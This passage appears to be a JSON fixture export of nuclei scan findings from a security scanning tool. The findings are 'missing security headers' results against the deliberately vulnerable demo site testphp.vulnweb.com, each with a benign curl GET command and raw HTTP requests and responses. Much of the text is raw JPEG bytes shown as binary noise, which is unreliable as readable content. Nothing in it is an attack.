篡�ӟO<���bd(����i�n��o\u001b���q��������7z\u0016#�U���������fe^\u001a���.kYrQ�4E�5����d��\u001c\u0002NԠ�\u0010��$w��O�0$\u0012��x���L���\u0004��.�lR�c�H5���Ŭ1��Y\n�\u0006�\\\u0005\u0003�_<�n�՞2��'u�84s�B\u001a��i��J\u0002�*�GI1�a\u0011�6�T��\u000b*�\u000bW�\u001f�~���P`��P��ۻ1w��fbI�9���h��\b����\u0015QI&�\u0001G=z<��\u0015_\u0012�i\u0001/c@��ZS�H��b\u0012��\u0018�K�`R9w,G\u0002\r_S���K�ַZ��~!9�4��5Dc܇jPF\u001cݐ�l}�{4���锉��*fm�����׻h\u0015f��\u0019{z!��\u001d8W`_���\u0005�W`C��o�=M�\fG\u000fu`\u0001���\u0010\u0019%<��fk����I/�4_\u0001�/�f_�,(�HǫРM�=\u0005�?z�mY;����\t\nzu��篃]\u000em|GYꬔ�B�%MY՟�\u0017]<�kkUQ\u0015���V76�D�������\f�������/�p�M\u0010!����o��J�[�;\u001b\u0004_RB�#\u0005��@�� �=8$_�p�Y\nV�2\u0016�%��\u0007��yѨgӘ\r\u0018�=7W��\u001f�\u0016�|\u001b=1��b�+�<�� <O�j�\u0003V玎�+~�Q����x���\u001d��?\u0010O,_��'��C\u001bN�b�<�n\n\u0018��n��\u0018�\u0015d_��N\u0011��;�\fȼ���͑��{4�tq�:HF�I57"�\f�\u0013a�F��������B��'$���\u0019cy^��8���\u001e6�^E�\u000e_����ru��La��\u0019�6�\r\u0005t$\u0017b�\u0016�kn9�U���?�U�m�\u0015��O5|�z#��;.��Ԛ�i*���v�b\u0005� ]mcԟq��\f�l��\t%E�\u001c�'?��O\u0007�'��)�њ8�\u000b�u\u0006�Y���nQ�ߥ�9��\u0002\r\n��W\u0015�����i�u�qFY�)U�n��\u0002��ӽ\u000b$�,~f#(t��87���G>*�}z��/{�@5S��z\u0016�\n�!f�H�\u0019\u0002m\f�6��n�\u001b`\u0005�NVȻ\u0013�9\u0004��]����7W�,�,��_zG\fP@�!�\u0004h��\n\u0005\u0001}�;�p�,��d��Z�O\u0003�j<�t�\b�A2\u001a�\u0013|u�+��*�S�Ԑ\u0011�3���������h��?A�V2\t�,�\u0015��*���A�Zy����d'k*�-�M����n�\u0007��\u0016E�S\u0011C\u000b�%���_�}�50j\u0016#�i�ƀ���W�U��j�y�1\u000b\u0006��\u0013��$��2Q�uA��P��I�2i=�\u001b��\rq�h�P+�\t��$��\r$���x�`��\u0001\u0007�\u0004U����p\u0004E�Ԅt8�Dl!����\u000e��\u0016���%�j&�\u001eÓҸ\u001c�\u0005��uh�eT\by��ہ\u0016v��]��;���k�^��/#6�����l�\b\u0015`\u0002�x\u0007�8�{<�\u0007\u0006�\u0015���ZD�\u0002Á�Z�Yv�3X�x�]�\u000b9:v����\u001c\u001fo��*�t������l'���\u0015d�)�XC����A?�[�;\u001e0̆�\u0006���{$�:\u0011~E�\u001eˌE_�:�cd�6����@\t x\u001f�ZX�0���r\b�\u000b&�X5q��W��\u00114!Ķ(\u000b�P�\u0015�!`�\fQP��\u0016]���S@(n�\u0015<�?sB�h����=\u001e,�&�63��׿mO�ȅ\t I�C\u001c��\u0010�ɽ�ŀ꠆�u\u0004\u001a�#��|�`j��T�\u0014h�1=�\u0004W ݃�&󷦱�fU\u0014\u000b��#�O'��F�>y�\u0013�1���|�&U\u0004�`,{�\n8�g�$���N�!sjň\u00062�]\u001b����Uu�s����s�`t%�T�\u001bzr���\u001bd$h�����&�鿱Q��Z2��J�E3�.��#���\njd3\u0015�L��R�E��d�\u001cw<p:_$N҅�Nc\u0006��\nO���T�5\b�G#iF�\u0011?.����@������Y�y\u001c�̞h*gf\u0014�3-�N��#B;��z���b\u00074t�E�P�ʦ3 ��v��H\u0004\u000b�\u0016y=,���\u0014�"x�\u0002�����J�\u0005J�<�$�\u0004U^Dح�כ\u001dc�c\u001aK��K_���9^\u0018�W�aZ�]��Զ’\u0002�T�\u0006(y��\u000f���9c\u001c<�\u0014���,�t��Y��_o\u0019\u0016������7��b�T��cma��q�Y�^\u0017��N#V+�q�.�C"���L\b�M��:\u0002~�k�|�}�xA�*���8����Y\u00022�*�\u0004\n6��\u0001�\u0003���\u000e+�I\u001e�T\u0004\u0006�*�t�/8Xb��\f�akr��V4��$���Cvp��.W�\b\u001a�\r��5F\u0016�7F�o[�\u001d�#��w}1��n\u0010MHٛ���k��L�,Z��\u0005\u0014Esȫ\u0007�:x�k�U��h�~ߘ���^*��\u0019��8X���|x4L:�Ga����]Z�\u001b,jC9�!�\u001e\b����ŞVaL���Qg9~p\f��+���\u0019�\u001a��l�p�\u0018�Q�\f1'F\u0018a�$g\u0018�\u0018c\u0014�u\u001d��o�\u0018bR���\u0018`�F\u0018a�$a�\u0018�Fr�\u0018bF�a�\u0018(���", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 902, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' 'http://testphp.vulnweb.com/pictures/4.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/4.jpg.tn", + "discovered_date": "2024-11-13T02:42:22.423Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/4.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4615\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:58 GMT\r\nEtag: "4dca64a1-1207"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0002\u0003\u0001\u0001\u0001\u0001\u0004\u0005\u0003\u0006\u0002\u0001\u0007\b��5\u0010\u0002\u0002\u0001\u0003\u0003\u0002\u0005\u0002\u0005\u0003\u0005\u0001\u0001\u0002\u0003\u0011\u0004\u0012!\u00051A\u0013Q\u0006"aq�\u0014�#2B��R��%3���b��\u001a\u0001\u0002\u0003\u0001\u0001\u0001\u0003\u0002\u0005\u0004\u0006��0\u0011\u0002\u0002\u0001\u0003\u0001\u0006\u0005\u0003\u0005\u0001\u0001\u0002\u0003\u0011\u0012!1A\u0004\u0013"2Qq\u0005a���3��\u0014#Rb����\f\u0003\u0001\u0002\u0011\u0003\u0011?K4�5���\u001d�Ô\u0012I�?�#Y6��^�s`\u001f��# 2�#Ag��&V\u0016\u000f���:����'���02t��>\u001cnX3P�W��s��D�-���#�&8�3���q�\u0011�A�4\t�����0+���F�!�4�"��#�)c�\u0002�\u001b�zTZ��Wo\u0015�<s\r��\u00159D��&�\tRտ��\u000b�kZ$�������Z��>�{�rB�2�]�U]�wy \u001f\u001d���\u0010~�\r\u0006�K��ۊ�k�~����8\u000f��~fI\t\u001b�\u0015D\u001e���\u001d<�+\u0014(�v\u0002�j\u0003�?(Xi�|��RZ\u001e�C��o�.\u001e)w ! 3n\u000b�\u0013E���agU˔#BX�\u0002����=M���\u001a�}�\u0006�\u0002�=��\u001c��ca̭I���!�\u0003�N�Y�\u0019�0UdK��\b'��U����m��^>�Q��\u0012*��Q�\u000f\u001ac\u001c�\u0005�F���*�\\�4����ՆP\u0007<~t��U\u0014�2�<�gz��\u000f$Y���e�\u0006�?3\u0003�\n<v���X\u000e`U,p&�7�C\u0017�cW\u0006hP3/��[=�?�f\u001aL���"��ʑ��r�,�\u0015�*�\b.�"�$�\u0016{�\u0018="l����v��l�<�U#��I�r�x��ֶ�/�A�\u0015�C� BĒhj�-�g����\u0007�Г4���CL�\u0018\b��(�h�\u000by\u001c�B�\u0017�f&<pƱ�\u001a�(��(\u0001�5\\*\u0005\n�q�:��\u001bE\u0016&\\�����Q�\u0013�utg��}����\u0003��\u0019?��\t\u0014��@�\u001e,�����鼓n]/���U܄���Z\u0007��:[�ԃdK\u0004��e'bHl���s]������:\u000e�\u001c�ގ�9�?��U\u0010�)���:�\u0003+P\u0004��aF�X�<\u001b≩��0A��\u0003��X]O!�\u001a\u0003���A�H����6���{\u001f�T6�Ǭgvl�\u001e�[���X\u001c����\u0007=���o�M��/}f����W�\bn��8���\u0016"I�/A\u001b\u0005�������<��uy"R�ŀ���������\n\u001cԺ�t���,孨\u0011�P�A�\r��\u001a+3;ч��F;T{��[�����\u0016�V�6�uL��e��\nۈ,YX���?��N:.*b@����Q5}�������\u0007Ցi��}�������\n;��ד�h��/�Ӂ���9hw\u001f[���\\\\92_w��\u0010��\u0018�\u000b��\u001f�'��w3��8\u0001Yop\u0006ڂ�l�+C���:��r�t`zLV�A�|\u001f�\u0003��\u0002;\u0017�D�mm���\f̾���@�B7)��2�H��Ǜ�\\\u0011VF�};�'��L*@ۈV4O�ߑu��p1��ُ\u0018E�hw>��?]<��\u001fM\u0010�L�f�Sa\fƌ\n}t|_���15F����\u000e�\u0015\u000fSD\u001d^�\\��\t(\u001cX�j�:�:�\f�\u0018�y\u0007]�\u001fm#��`��S#*\b�@f\u000e�\u0015_sΪ\u001dy^L��\t�1Ŵ���k�7|7\u0015|}E���#3�#29�r8`{Q�΢\u000f�!�F$e۸�\u0018Ճ��<w\u0014k��uFN\u0013㱓\r�Ѱ��\u001d��·l�U&�r=��GϿ���ͦ�4�:�9�C���O��\u0015Z\u0012|�\\�$�\u0016b\u0015bI \n\u001c���^uT��f!��!�V��Uoɮkށ5�\u001e�\t�W�3(,�~`�F������k,���o4��r80����3��7Uλ���\u0015\u0001��;�\u001et�ى�����\b>ڂ^E����M�����@\u001as�=ŘC�\u0001�(�p�˘ϐ���)��"�<�0�z�7ȡ����yI\u0004b��{��8c��s=%A�&h�u�-�\u0001���3��f�\u0011���k�#��\b\u001d�滊҈D��z��+���O��cP\u0007a�x\u001fm<3Y��g�%\u001b�������"a,�|���k\u001e\u0001�kM�\u0015h\u000eݴ�\u0019UG}^z�\u0011r�(\u001e�k���\u0014N&f���4p����`<��.\u000f�Rf\u000b\u001cr��LE��\u0004w�a�\u0013;�d�$X�\u0018�o�($���A\u001e���\\���t��[��q'P�\u0014/,����I�\u001a\u001e_�q��#74I`E-{�?��F�\u0011|?��\u001eJL\u0015\f��.@!d\u0003�\u0006���oO��me��t��1���8 �5�>��~u\u0001c�B�93����pS\u0019\b���\u0003nu䊢;P����S'&N��2"���\u0006W��G�<��\u0011‚ǎIZ�l?��\u000f\u001b\u0010�\u0005YV�c\fB�\u0015��\u001am�Ӡ�%H�DU�ÿ���\r$�dր�D��bu\u0003�,�2\u001c��匨X���!,�\u0018�\u0017d\u0011\\�\u001ac��\u001b����dIe�(\u001fP�IT�qUVŅ�<\u000f�:�E\n�8�H�x�Um+�\u0006֟���p�_P�'�#��\u001a\u0007*e�9\u0004r\u0015\u000e�[k0��}�P~�L�V'\u00042���<��A�v��H}x��\u0013_�����\u0019L�B��X��B\u0014\u0005RV@K\u0012�KpG�\u000bDrh��3ʞN�xZ�����\u0006��VyY�o�w\u0010\u0016��\u001a�\u0011L�"���\u0005\u0004�s��s�>�y�m6���8��K0�"X��[Q�\u0016\u000bE�$�#q�g�\u001ck±�Ħ�*�һ�\fy#m\u000e,7�6\u0001��}#�\u001c���,����U��6ڀ���FGs��8\u001bZ�Zڋ�t�\u0017�,�\u001a��z�Wj7���UR��s@�\u000e\u0015\u0012\f�A�j����\u0013,H;�%\n��\u0016,_o���^��]�0�G�6��\u0014�n�\u001d�:�*_\\��1y�|��\u0004aM�v�F�B�_j��(�\u0006��o^���\\\r�����23\u001e�e�\u001d\u0013p\u0004�\u0004�\u0007�<\u000f�\u001a�3�$\u0003���\u0007��m\u0005�\u001cKF�>羝c\u0015\u0015ڵ���'\u0013\u001e��v\\�� �͖�䊾�(�<��8}\u000e\u0012�g&m����#��\u001f�����u��4Ǒx�N\u0015/]�s��\u000e�ohN/O�y1!n9e��7�\u0018�(�\u0006�Ǖ}��a\f����\u0004��a\n\u0001㶎�@ \u001f���ƍ��\u0007Τ���\u0017�\u0010@�18��\u001d\u0017\u001bX\u001e�BH\\c������܂4B\u001e~�\\։\u0004��?MP��I\r��ݹ��z���I� wfc�\u0015\u0014Y��@{\u0001��4ר.Yp�4E\n#�V$|�\u001bo4l]\u001e;���̼KT2wT��\u0013�\u001b?1���\u001e\u0007�IuR<+7������!{\u0010O�\u0013\u000e�3Y\u0016D�cb\u0003�a[�\u0018X\u0006��\u0001�ڹ\u00122[a�\u0007������\u000e\\,eґAU!@�߸\u001c�7ި{k\u000f��}Y����٢�\f\u0018ϰ|\u000f��_\u000f┃\u001f�ފ%\rD_'r��\u0004W\u0017ߛ�1�\u001bu\u0015�̝�(��]�T\u0016�l��Ln��\u0015Wܒöc#v8�9m\\��\u001bQ�Bֈ�]��^�9\u0001�.ϕ���N�ş��ן���l�&����p72��ܮ\t\u001f�T��n;\\M\u0005&�er�\u0006�E�n�Q<v<X44:\u0002Ɖ�{��h�@G��U��Q���1�O�Y�u��0ر\u0016p7\u001d���^O���������^�WƂ�,�N�N��I�L�:�%\t��������d\t�\fL���P�\u001d\u0016\u001c�#\r1eC`m\u000bb��U���ǁE&&zez���\u0018(P�[�\u001b6�7F����p5~\u0014��\u0001FR=��|`\rk�T��e�h�>/�H�}Y\\��qH�G�\u0001~/p�o����&���\u001a)V4�\u0004J�\u000e��\u0018�E\n<��^�ֆ\b�\u0003�\u001d\f �����̯~O L�?W��#�VV�f�dJ2P;��;�U\n�Y���:�x\u001d>6�7�-��V2ށ,F�7\u000f��أ}�j#�R;\r\\�>\u0016]�1�p<��>�w��1\f\u001f\u0015��4%�\u001e�V(��捀A\u0006��{���\u001f�P�\u000e>T�\u0015�r\u0002:�b�\u00057`\u001e\t����ӡb��#GUz�\u000e�h\n\u0003m�\u0001�@d�\u001b�4\u00016��x�<J\u0002�c�)a`\u001a&�w��\t\u0001����~ M�n�u����3�{\u001a\u0004�{���Lq��,��\\�\t��SI�S{\u001b�G�\u000f���|;!�\u0010���&r.�*�T[\u000e~m�h_��F�\u001d\u0003��VwM��9�I�4��ƕ\u0003!<w#m��}��\u0016\u000eO"@�zϞ�<p#3��)=\\�\tP���[���0�!\f��#J״�`S�<|��W�1�ۜ�H",h*�:S)}��u�b�p����D#\u0001{�\u001a��B�\u0006�;��4X�\u000b~M\u0002k�\u000e�?O���6@BѻF�\u001c:�5`�D\u001a���m\u0005�\n�H��\u0003w\u0002�����bj\\�\u0007��t��]���x�Z3HСD%����T�\u0017B�\u001e��v��\u0002��[�B>cc�u�P�|���˃d����\u0015����\u0016@;\u001et���I q���\u001c|���J���CL��1�%@�B��\b\u0004�5�\u001b\u0017V<�8��#�Q\u001364�E#Fɹ\u0018���k\u000e<\u0010H#�$jΒޤ~���S�������Z�:\u000f\u001d'5����zs;�Ӥ��6�\r\u0015$i�⤠nE?q���sK\u0019h\u0018�( �5d]_﫺fw�L\u0019$�k�G�\\��ЧO��m�1�����\u000e��H���\n��x\u0004]�}���<���$0ώ��\u0010�B7314\u0015Tr����c�j���\u001aJ�]A\u0017tG�\u0007L����s�嶰g�8��W\u001f"F�\\\t\u0013�S��_c�:���GYy�\u0002z��\u0011;U���\u0001I��]�w�گ�d�t��Xs\u001d�fW��\u001c���x\u0004X�/�W����D\u0005\u0015�C7�U����p+β]\u001b�<l�}Rޒ\u000b�C]�\u0007����@�bN�"20e"�\u0006�\u001a� �\u0014�T��\u0011�>8�\b�����������Q��\u0010N�;�\u001a�b\u0007ƺQgV��^5�e�B\u0004��Ƞ\u001e5��$�Ա�؟I�\u0012\u0001�������u�_���\u001d��~�\u0018Ѫ��Ҝh���1�A\u0013�\u001bA�����/����_�U�cV��\u0007�m_�\u00188S�@����SSUn\u001b��p>Oβ�\u0001���3�\u000fU����\ba�\\��SSV>E�J�����,u\u0006���:�\u001cO\u0003�\u00048B������Ӝef}$�\u0006=e�\tf˗��Z�m���ε���\u001a��)�\u0010\\1a\u0002\u001f\u0012�;k��\u0018��\b�����ՌX�ez�\u0004\u0011u���������=F\u0006�,\u001d��\u0004�菅sr'N�,�10亠�Ty�ۏmMM$y�='[oW��3W��T��}'\u001f+$ ��$( p�{�5���ښ�a�r�&\u0018�ͫ�󩩮\u000ba\u0013��", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 903, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51' 'http://testphp.vulnweb.com/cgi-bin/1'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/cgi-bin/1", + "discovered_date": "2024-11-13T02:42:22.614Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /cgi-bin/1 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=iso-8859-1\r\nDate: Wed, 13 Nov 2024 02:41:39 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n<hr>\n<address>Apache/2.4.46 (Ubuntu) Server at localhost Port 8000</address>\n</body></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 904, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36' 'http://testphp.vulnweb.com/pictures/3.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/3.jpg.tn", + "discovered_date": "2024-11-13T02:42:22.802Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/3.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 3725\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:42 GMT\r\nEtag: "4dca64a1-e8d"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0004\u0003\u0001\u0001\u0002\u0003\u0004\u0005\u0006\u0007\b��2\u0010\u0002\u0001\u0003\u0003\u0003\u0003\u0003\u0003\u0003\u0004\u0003\u0001\u0002\u0003\u0004\u0011\u0005\u0012!\u00061A\u0013"Q\u00142a\u0007q�\u0015B�\b\u0016#3C����\u001b\u0001\u0001\u0005\u0001\u0001\u0002\u0003\u0005\u0006\u0007\u0001\u0004��2\u0011\u0001\u0003\u0003\u0002\u0003\u0005\u0007\u0004\u0003\u0001\u0002\u0003\u0004\u00111\u0005!\u0012\u0013A\u0014Qaq�\u0006"#����2���3R���\f\u0003\u0001\u0002\u0011\u0003\u0011?��W�z�M.�wow\n�C$\u0012��\u001b�2\t�\u0004\u001f��V���\u0013u\u001b;6���Ŏp6�I�l<����I$�\r���xU�/E�]���\u001b\u0018\u0002�\u0010I�8\u0002�_A��\u001f\t;7�^�J��\u0013^\u0006��MB��N�M�]�k\u001b0Ei�\b\u0019���54R$��\u001c�b��\u001c�����V�}���&�ng�\u001at���\u0010�V^�\u001eB7���܌��\u000b�д\u000bk\u0013!���#\u001a��\u001f��\u0017�\u0018��@\u001cq��x��C��2Xn����^W��9��,\u001a=J�\r\u0015��[�V��N�n./u\u0012�\\Or-�F���\u000b�\t����v\u001cg<F*\u0012��JYLR\rǟ�KST����E\u0014Q^e��c\f\u001aJy\u0019�+�\\�t8&�JF)+�h��(B(��\u0010�F))�)���M�QE\u0014%-#���<u|�q��,�\u000e\u0016(W�.�� �(9��!N\f̀�\u001d\u0002H����1��#��j�]��6\u001a��픆+�w\u0012D�\u0003�����G��u=\u000b�r�!D�4��p�5�\r��\n6����\u000eq��\u0003�6��h���ψq\u001e�\u001f�UA�k�J8/a��wS�6�\u0010�\u0015\u0002M�㴞\b����|V\u0011\u0014*\r�\u0011K���Υ�b�\u001a�����\u0015\u001c"�\u001c��\u0005\u0001�)9�\u0004\u00023��\u0003Vnt����,��\u0018\f�,�����\b����;�T\u0018#4�\u0003��$_��Lj�s\u001fτ�\u0003�5F�e}^�錛�˹Q�ܟݸn\\�2pI�\u000e\u0018��p�A\u001bD�$c+�\u001bP�\u000e�r�}�ی�2@�+E�X��l��I$�\\͈�1�\u0018.�\u0005���\u001cs�c\u0007�n�\u001f�\u0012K�Y�\u0017��\u000eO�6\u0001 \u0012pH\u001cx�5\u0013�hkj�����^�\u0003�і4�T��\u0019쥺{�B[�=�<\n\u0010 �\u001d�m9ov�y�\u0003�;�[Qm+�fԯ`\u0002HmIJB�\u0002\u0015����\u0001��8���\u00157�w���RH�/��nTz��\t��;C�\u000f\u0019\u0007;\\�����Ҽ��29\u0006H\u001bm�:)��{\u0014%�w��4\u000f�{�R�K\u001b�)R{���KA��y\u0019U)�� n%�p2ɮ���4gP�@%Cn�|���s\u001e���=\u0002���L�wH���\u0005Q���B�\u001carX�[�\u0018�^X�Z��\u000fy�R���n\u001e�\nѤ��$3����.s�d`�\r�U�\u0004��\u0011�1����\u000b�|�T\r\u000e���#��zӲ��dRm��-. �����x�`q��7WW�\u0019\u0004py�KTw���\u0015k�^&�\u0014dc�\u0015!\u0019�L#\u0014�\u0013�u�QE\u0015ĤS[�:���Rٔ�QEq8��\u0010x�>�\u0016ݣv{�J����wY\u000b��E@op\u0007\u001f4G4��,���J����YO��G�J�u1�p�\u0016�������:�]Һ��P����+i\u000b<\u0013�;�\u0002\n����c������2\u000b��m6+�\u0016�\u0019��\u0006H��2�\u0006�\u0002�\u0005H�H'#\f8��f�w��t���t�7���`��Z\u0003�����x\u0004�\f�q���ƈ+�|f�\u001e�R��@w����>$�2����h��P\u0010v��\u00078� \u000e\u000f\u001c5c���x`\u0019&\u0017b_�y \f\u00021�ry>\u0006\u0001���L~�麪J���:X��\u0018�2����l(,s�q��8�ߤ���^�]\t��\u0005e�\u0010\u0006��;�a�\u001d��L��g\u0015V��梮��45����c�u3Y<U\u0014�\u0010�\\G��(��\u0004S.S�v�)]�8?�T���U��6�g;U\u0007���\u0007�p+Ch?��eN�͂�z\\[\u000b\tV�=1\u0011f!��\u0018݁��+��O\u0003�\u0006Z����els\u001cq�����}�\u0003\u0005����\u0005\fFv��S�\u001dr�D��9��k���O\u0004!w˳n�\u0016*�\u0001��\u001d��\u0003�U5�uN�6�&�B�{i�h���e)\u0018dS��\u001e\t\u0019�\u00185\u001eA\u001b/{\\\u000e�EE<�0�\u001aE��������Er�a�$�\u0018���.�\u0015��(��u�$`\r7a��B\u0001MU\u0002�{=-�}�5^�q�(\\7)�3Y�#�5-\u001e?B�oRɑ����z���I]��;�v���TG����9��#A\u001e)��|f�6+���z]�\u0015�ݴ��͆��FSϴ��mĀ�\n\u0014}ÀvΐV��$��E��\b\u001d�d�z{�l0���A�\u0018\r��+�S�\u0015���̈:;U�\u0018��o�C\u001e��\fH\u0014�9�nq��\u001a��\\�Z\u0007�<c�\u001f\u001f�{�c\u0012�\u001er�\u001d�P�@��E\u001c��+�W�k�^?\u0004\u000f��S��M�\u00078=����Hc�y�� S#���\t��o�{)$g `�dR�-��b\u0002��\u001d(!^��L�\\�Z\u0005����J�,ņ\u0006;\fg����ߨ�a��ԗ\u001af�,Q�X��n�\u0004�%�9\u0019V�;�3�\u001cv[�k\u000b)�YA�����A�\u0019��\u000f��\u0016��\u001a���s~>�c{q$�4r\b�"�IȐ�<�Kc䚶�3Hǽ�5\r\u0016h�����Z�Ao���[WGu����jVs�(�}5�.^\u0010�\u00138bQ@]ː9<�}�kg�\u001f\u0007k.@8a�23��kJ�.��Ӭn.���P��E\n�\u001cl�\u0018����p�x>�ʫ)\u0015�A\u001b��Y$���Ycm�c�\u0018\\|g�{��Q��Բ�YL�X��\u0002�w/~�\u001c��:glz}n��\u0014����eWJ�n�\u0014QE\tK��S�?�\u001e���e��2�~����~(E�h��w���Tl�⤢�\u0003eRH�v��@�\u0004�3�\t<e~���W\b��vn\u0018n\u0001�y ��\u0012��G\u0016��)�6ޙ �������3\u001b��?\u0014�7\u0002\u0017�l��Դ�.QU��E�#�~8#8$g���ޑ-�^��Kp���aLͱG~\u0013;s�8�'�q\\�􃨮.\u0012]\u001a�帒\u0012\u001a\u0007 �H�\u0014�\u0003\u0001U��'�'\u001c\fV��j����Z��%\t\u001eb�Uf�;\u0010�X/%w0�9�k*�����4;���\u0015ޒx*!�:�\u0019X�n�^�%�\u0001�0�F�I��\u0018��8 \u001c��d2�\u0007���ŧY�a�8�t��Q\u0019db��\u0018��I\u0018�rN1��V8�\u0015�QD�Jv���\u001fUI������D�K[�qf���*�m\u0004�\u0019�?8�#=�Z����.��I�C��b��\u001c[��#ö<n\bW�\u0005��8 �9��6IP�\t���yq\u001c��7PA��=��\u0015�0 1�+s��2\u0006pO��*�9.����d��=R�d<��\\��\u001f��l���\u000f�ț,\be�q�8$v�<g�\u0017�y���M�ҭ�./�`N@P\u0019�\u0004�\u00120q�ۃ�v\u0016\u001b�"��Ťv2q���ѩ��\u001eI(��ez\u0017������F�(��$�(?ju\u0015�ۨ�~iʠS��Ⱥ\u0001 